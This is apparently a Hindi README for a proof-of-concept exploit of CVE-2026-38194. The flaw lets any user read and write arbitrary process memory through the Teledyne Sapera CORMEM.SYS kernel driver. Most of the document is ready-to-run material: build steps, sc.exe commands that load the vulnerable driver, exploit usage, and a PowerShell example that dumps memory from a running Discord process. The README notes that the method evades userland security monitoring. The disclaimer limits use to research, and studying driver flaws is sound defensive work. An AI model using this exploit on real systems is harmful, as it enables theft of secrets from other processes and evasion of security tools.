
यह टूल CVE-2026-38194 का प्रदर्शन करता है, जो Teledyne Digital Imaging Sapera Memory Manager (v9.0.0.0 और उससे नीचे) में एक कमजोरी है। CORMEM.SYS कर्नेल ड्राइवर बिना किसी एक्सेस कंट्रोल जांच के IOCTLs को उजागर करता है, जिससे एक सामान्य गैर-विशेषाधिकार प्राप्त उपयोगकर्ता कर्नेल के माध्यम से सीधे किसी भी प्रोसेस मेमोरी को पढ़ और लिख सकता है — Win32 API निगरानी को दरकिनार करते हुए
अस्वीकरण:
यह परियोजना केवल शैक्षिक और सुरक्षा अनुसंधान उद्देश्यों के लिए है। इसका उपयोग केवल उन सिस्टम पर करें जिनके आप स्वामी हैं या जिनके परीक्षण की स्पष्ट अनुमति है। अनधिकृत उपयोग आपके क्षेत्र में अवैध हो सकता है।
यह उपकरण CVE-2026-38194 का प्रदर्शन करता है, जो Teledyne डिजिटल इमेजिंग Sapera मेमोरी प्रबंधक (v9.0.0.0 और इससे नीचे) में एक भेद्यता है।
CORMEM.SYS कर्नेल ड्राइवर बिना किसी एक्सेस नियंत्रण जांच के IOCTLs को उजागर करता है,
जिससे एक सामान्य अविशेषाधिकार प्राप्त उपयोगकर्ता कर्नेल के माध्यम से सीधे मनमानी प्रक्रिया मेमोरी पढ़ और लिख सकता है — Win32 API निगरानी को पूरी तरह से दरकिनार करते हुए।

मेमोरी को ReadProcessMemory के बजाय भौतिक पता अनुवाद (पेज टेबल वॉक) के माध्यम से एक्सेस किया जाता है, जिससे यह अधिकांश यूजरलैंड सुरक्षा सॉफ़्टवेयर के लिए पारदर्शी हो जाता है।
cmake -B build -A x64
cmake --build build --config Release
यदि CORMEM.SYS पहले से लोडेड नहीं है, तो इसे व्यवस्थापक के रूप में मैन्युअल रूप से लोड करें:
sc.exe create CORMEM binPath= "C:\path\to\CORMEM.SYS" type= kernel start= demand
sc.exe start CORMEM
समाप्त होने पर अनलोड करें:
sc.exe stop CORMEM
sc.exe delete CORMEM
cordrv_exploit.exe <pid> <address> [size]
pid प्रक्रिया आईडी (दशमलव)
address पढ़ने के लिए वर्चुअल पता (हेक्स)
size डंप करने के लिए बाइट्स, डिफ़ॉल्ट 256, अधिकतम 1048576
# मुख्य Discord प्रक्रिया प्राप्त करें
$proc = Get-Process -Name "Discord" | Sort-Object WorkingSet -Descending | Select-Object -First 1
$discordPid = $proc.Id
$base = $proc.Modules[0].BaseAddress
Write-Host "PID : $discordPid"
Write-Host "Base : 0x$($base.ToString('X'))"
.\build\Release\cordrv_exploit.exe $discordPid "0x$($base.ToString('X'))" 256
अपेक्षित आउटपुट:
[*] Target PID : 16364
[*] Target address : 0x7FF6FC180000
[*] Dump size : 256 bytes
[*] Initializing CorDrv...
[+] Driver initialized.
[*] Finding system DTB...
[+] System DTB: 0x1AE000
[*] Searching EPROCESS list for PID 16364...
[+] Process DTB: 0x2CD30F000
[+] VA 0x7FF6FC180000 -> PA 0x1A98C2000
Memory dump (0x7FF6FC180000, 256 bytes):
7FF6FC180000: 4D 5A 78 00 01 00 00 00 04 00 00 00 00 00 00 00
7FF6FC180010: 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00
...
[+] Done.
ऑफ़सेट 0 पर 4D 5A पुष्टि करता है कि MZ हेडर भौतिक RAM से सफलतापूर्वक पढ़ा गया।